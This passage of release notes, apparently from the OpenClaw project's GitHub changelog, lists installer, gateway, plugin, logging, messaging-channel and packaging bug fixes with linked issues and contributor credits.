<li>Windows install/Lobster: execute <code>pnpm.exe</code> directly when <code>npm_execpath</code> points at the native pnpm binary, add an installed-package fallback for the Lobster embedded runtime, and include the Lobster runner regression test in Windows CI. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4298637607" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69456" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69456/hovercard" href="https://github.com/openclaw/openclaw/issues/69456">#69456</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/igormf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/igormf">@igormf</a>.</li>
<li>Gateway/install: refresh loaded gateway service installs when the current service embeds stale gateway auth instead of returning already-installed, avoiding LaunchAgent token-mismatch loops after token rotation. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4318448606" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70752" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70752/hovercard" href="https://github.com/openclaw/openclaw/issues/70752">#70752</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hyspacex/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hyspacex">@hyspacex</a>.</li>
<li>Update: ignore bundled plugin <code>.openclaw-install-stage</code> directories during global install verification and packaged dist pruning so leftover runtime-dep staging files do not turn successful updates into <code>unexpected packaged dist file</code> failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329154464" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71752" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71752/hovercard" href="https://github.com/openclaw/openclaw/issues/71752">#71752</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/waynegault/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/waynegault">@waynegault</a>.</li>
<li>CLI/update: fail package updates when post-update plugin sync fails and refresh legacy npm plugin install records before trusting unchanged artifacts, preventing successful updates from restarting with stale or failed plugin state. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Release/update: reject pre-populated bundled plugin <code>.openclaw-install-stage</code> directories, including mixed-case path variants, before package inventory generation so release tarballs cannot ship poisoned runtime-dependency staging debris. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329154464" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71752" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71752/hovercard" href="https://github.com/openclaw/openclaw/issues/71752">#71752</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</li>
<li>Node runtime: keep node-host retry timers alive across Gateway restarts and exit on terminal credential pauses so supervised nodes do not become silent zombies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4304346722" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69800" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69800/hovercard" href="https://github.com/openclaw/openclaw/issues/69800">#69800</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/meroli28/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/meroli28">@meroli28</a>.</li>
<li>Gateway/plugins: stop persisted WhatsApp auth state from activating bundled channel runtime-dependency repair during startup when <code>channels.whatsapp</code> is absent, avoiding npm/git stalls on packaged Linux installs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330154277" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71994" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71994/hovercard" href="https://github.com/openclaw/openclaw/issues/71994">#71994</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xiao398008/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xiao398008">@xiao398008</a>.</li>
<li>Gateway/device tokens: enforce caller-scope containment inside token rotation and revocation so pairing-only sessions cannot mutate higher-scope operator tokens. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330129522" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71990" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71990/hovercard" href="https://github.com/openclaw/openclaw/issues/71990">#71990</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/coygeek/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/coygeek">@coygeek</a>.</li>
<li>Plugins/channels: keep security checks, thread-binding placement, provider summaries, health formatting, and message action labels on read-only or already-loaded channel metadata instead of importing full channel runtime. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/status: keep config-only channel labels and status security summaries from importing plugin runtime modules just to render metadata. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Sessions/channels: stop group-session metadata from loading bundled channel runtime just to classify <code>#channel</code> subjects, using only already-loaded channel capabilities on that path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/channels: keep native command and native skill <code>auto</code> defaults on static channel metadata so config, audit, and command-list checks do not load channel runtime just to read those defaults. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/channels: keep channel remove selection and all-channel capabilities summaries on read-only plugin metadata, loading channel runtime only for the selected mutation path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/models: keep Provider Index preview rows out of <code>models list --all --provider &lt;id&gt;</code> when the owning provider plugin is disabled, preserving config authority for cold catalog fallbacks. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/model runs: keep <code>openclaw infer model run</code> on explicit OpenRouter models from loading the full provider catalog or inheriting chat-agent silent-reply policy, restoring non-empty one-shot probe output. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289787526" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68791" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68791/hovercard" href="https://github.com/openclaw/openclaw/issues/68791">#68791</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/limpredator/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/limpredator">@limpredator</a>.</li>
<li>Installer/macOS: rerun Homebrew install steps without the gum spinner when raw-mode ioctl failures occur, and avoid claiming <code>node@24</code> was installed when the Homebrew keg binary is missing. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4312670571" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70411" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70411/hovercard" href="https://github.com/openclaw/openclaw/issues/70411">#70411</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/1fanwang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/1fanwang">@1fanwang</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dad-io/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dad-io">@dad-io</a>.</li>
<li>Installer: load nvm before Node.js detection so <code>curl | bash</code> installs respect nvm-managed Node instead of stale system Node. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4093236636" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/49556" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/49556/hovercard" href="https://github.com/openclaw/openclaw/issues/49556">#49556</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/heavenlxj/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/heavenlxj">@heavenlxj</a>.</li>
<li>Installer/Windows: route PowerShell install failures through a top-level handler so <code>iwr ... | iex</code> returns control to the current shell while direct script-file runs still exit non-zero. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4034858716" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/38054" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/38054/hovercard" href="https://github.com/openclaw/openclaw/issues/38054">#38054</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PwrSrg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PwrSrg">@PwrSrg</a>.</li>
<li>CLI/Volta: respawn raw <code>openclaw</code> CLI runs through the named <code>node</code> shim when the current Node executable resolves to <code>volta-shim</code>, avoiding direct shim execution failures in non-interactive shells. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4288940390" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68672" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68672/hovercard" href="https://github.com/openclaw/openclaw/issues/68672">#68672</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sanchezm86/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sanchezm86">@sanchezm86</a>.</li>
<li>Installer: warn when multiple npm global roots contain OpenClaw installs, showing active Node/npm/openclaw plus each install path and version so stale version-manager installs are visible. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4044590366" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40839" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/40839/hovercard" href="https://github.com/openclaw/openclaw/issues/40839">#40839</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhixianio/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhixianio">@zhixianio</a>.</li>
<li>Cron/tasks: recover completed cron task ledger records from durable run logs and job state before marking them <code>lost</code>, reducing false <code>backing session missing</code> audit errors for isolated cron runs and keeping offline CLI audit from treating its empty local cron active-job set as authoritative. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330026583" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71963" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71963/hovercard" href="https://github.com/openclaw/openclaw/issues/71963">#71963</a>.</li>
<li>Docker: copy patched dependency files into runtime images so downstream <code>pnpm install</code> layers keep working. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4293534495" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69224" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69224/hovercard" href="https://github.com/openclaw/openclaw/issues/69224">#69224</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gucasbrg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gucasbrg">@gucasbrg</a>.</li>
<li>Package: include patched dependency files in the published npm package so downstream installs can resolve <code>patchedDependencies</code>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4293534495" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69224" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69224/hovercard" href="https://github.com/openclaw/openclaw/issues/69224">#69224</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gucasbrg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gucasbrg">@gucasbrg</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/channels: treat malformed bundled channel plugin loaders that return <code>undefined</code> as unavailable instead of crashing config and help paths. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4291595561" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69044" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69044/hovercard" href="https://github.com/openclaw/openclaw/issues/69044">#69044</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/frankhli843/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/frankhli843">@frankhli843</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Scripts/watch: show corrupted dependency package-config recovery guidance when <code>gateway:watch</code> fails during watcher startup, without double-logging unrelated import failures. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4184421615" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58780" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/58780/hovercard" href="https://github.com/openclaw/openclaw/pull/58780">#58780</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roytong9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roytong9">@roytong9</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Signal: read signal-cli RPC, health checks, and SSE events through Node's HTTP client so Node 24/25 fetch regressions do not break Signal sends or inbound events. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4112941905" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51716" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51716/hovercard" href="https://github.com/openclaw/openclaw/issues/51716">#51716</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4122411587" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/53040" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/53040/hovercard" href="https://github.com/openclaw/openclaw/issues/53040">#53040</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Barukimang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Barukimang">@Barukimang</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/minupla/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/minupla">@minupla</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Skills/Docker: run npm-backed skill dependency installs with an OpenClaw-managed user prefix so non-root Docker images do not write to <code>/usr/local</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4193497158" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59601" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59601/hovercard" href="https://github.com/openclaw/openclaw/issues/59601">#59601</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chanjarster/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chanjarster">@chanjarster</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Agents/runtime: submit heartbeat, cron, and exec wakeups as transient runtime context instead of visible user prompts, keeping synthetic system work out of chat transcripts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4261476582" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66496" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66496/hovercard" href="https://github.com/openclaw/openclaw/issues/66496">#66496</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4264783156" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66814" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66814/hovercard" href="https://github.com/openclaw/openclaw/issues/66814">#66814</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jeades/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jeades">@jeades</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mandomaker/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mandomaker">@mandomaker</a>.</li>
<li>Telegram: include native quote excerpts automatically for threaded replies and reply tags when the original Telegram text is available, without adding another config knob. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3884461774" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/6975" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/6975/hovercard" href="https://github.com/openclaw/openclaw/issues/6975">#6975</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rex05ai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rex05ai">@rex05ai</a>.</li>
<li>Node/Linux: make <code>openclaw node install</code> enable and restart the <code>openclaw-node</code> systemd unit instead of the gateway unit on node-only VMs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4285532256" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68287" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68287/hovercard" href="https://github.com/openclaw/openclaw/issues/68287">#68287</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dlebee-agent/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dlebee-agent">@dlebee-agent</a>.</li>
<li>Browser/CDP: retry transient raw-CDP WebSocket handshake failures before any browser command is sent, and reconnect stale persistent Playwright CDP sessions for safe tab-list reads without replaying mutating browser actions. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4276826431" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67728" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67728/hovercard" href="https://github.com/openclaw/openclaw/issues/67728">#67728</a>.</li>
<li>Gateway/Linux: retry <code>systemctl --user enable</code> after a second daemon reload when the freshly written gateway unit is not visible yet on migrated systemd installs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4246585581" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65184" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65184/hovercard" href="https://github.com/openclaw/openclaw/issues/65184">#65184</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/liushuaiiu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/liushuaiiu">@liushuaiiu</a>.</li>
<li>Telegram: preserve exact selected quote text when sending native quote replies, and retry with legacy replies if Telegram rejects quote parameters. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330007852" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71952" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71952/hovercard" href="https://github.com/openclaw/openclaw/pull/71952">#71952</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rubencu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rubencu">@rubencu</a>.</li>
<li>Plugins/CLI: preserve manifest name, description, format, and source metadata in cold <code>openclaw plugins list</code> output without importing plugin runtime. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Security/audit: read channel exposure and plugin allowlist ownership from read-only plugin index metadata so cold audits do not depend on loaded channel runtime. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/chat: keep <code>/plugins list</code>, <code>/plugins enable</code>, and <code>/plugins disable</code> on the persisted plugin index path so chat plugin management does not load diagnostic/runtime plugin registries before execution. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/doctor: read workspace plugin status and legacy web-search ownership through installed-index manifest metadata instead of broad manifest registry scans. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/agents: read channel provider status from read-only plugin index metadata for text <code>agents list</code> output instead of the loaded channel registry. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Logging: redact configured secret patterns at console and file-log sink exits so credentials that reach the logger are masked before terminal display or JSONL persistence. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4279976745" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67953" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67953/hovercard" href="https://github.com/openclaw/openclaw/issues/67953">#67953</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Ziy1-Tan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Ziy1-Tan">@Ziy1-Tan</a>.</li>
<li>Gateway/services: refuse process and service mutations from an older OpenClaw binary when the config was last written by a newer version, preventing split-brain installs from stopping or rewriting newer gateway services. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4164454666" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/57079" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/57079/hovercard" href="https://github.com/openclaw/openclaw/issues/57079">#57079</a>.</li>
<li>Gateway: reserve <code>/healthz</code> and <code>/readyz</code> ahead of plugin, canvas, and Control UI HTTP stages so liveness/readiness probes still answer when a later route handler stalls. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4301852326" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69674" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69674/hovercard" href="https://github.com/openclaw/openclaw/issues/69674">#69674</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Xike-Creek/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Xike-Creek">@Xike-Creek</a>.</li>
<li>Logging: load <code>logging.file</code> and redaction settings directly from the active OpenClaw config path in bundled runtimes, so packaged gateways stop falling back to <code>/tmp/openclaw</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4191142978" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59370" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59370/hovercard" href="https://github.com/openclaw/openclaw/issues/59370">#59370</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4268830246" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67168" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67168/hovercard" href="https://github.com/openclaw/openclaw/issues/67168">#67168</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4207216477" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61295" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61295/hovercard" href="https://github.com/openclaw/openclaw/issues/61295">#61295</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/KeaneYan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/KeaneYan">@KeaneYan</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Pan9hu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Pan9hu">@Pan9hu</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zsjlovelike/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zsjlovelike">@zsjlovelike</a>.</li>
<li>Logging: rotate file logs at <code>logging.maxFileBytes</code>, keep bounded numbered archives, and make long-lived rolling loggers follow the current-day file instead of suppressing diagnostics or writing stale dated files. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4182641485" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58583" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58583/hovercard" href="https://github.com/openclaw/openclaw/issues/58583">#58583</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4216327509" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62381" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62381/hovercard" href="https://github.com/openclaw/openclaw/issues/62381">#62381</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jpeghead/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jpeghead">@jpeghead</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhaoleink/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhaoleink">@zhaoleink</a>.</li>
<li>Agents/groups: treat clean empty assistant stops as silent <code>NO_REPLY</code> only for always-on groups where silent replies are allowed, while keeping direct and mention-gated sessions on the incomplete-turn retry path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MagnaAI/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MagnaAI">@MagnaAI</a>.</li>
<li>macOS/Node: keep native remote app nodes from advertising <code>browser.proxy</code>, start browser-capable CLI node services through the restored <code>openclaw node start</code> command, and show an actionable browser-control error when the local control service is missing. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4263105927" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66637" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66637/hovercard" href="https://github.com/openclaw/openclaw/issues/66637">#66637</a>.</li>
<li>Gateway/update: fail package updates when the restarted managed gateway reports the wrong version, including fallback restarts and JSON mode, avoiding false-success mixed-version restarts after macOS LaunchAgent updates. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329551146" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71835" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71835/hovercard" href="https://github.com/openclaw/openclaw/issues/71835">#71835</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/abhinas90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/abhinas90">@abhinas90</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jsompis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jsompis">@jsompis</a>.</li>
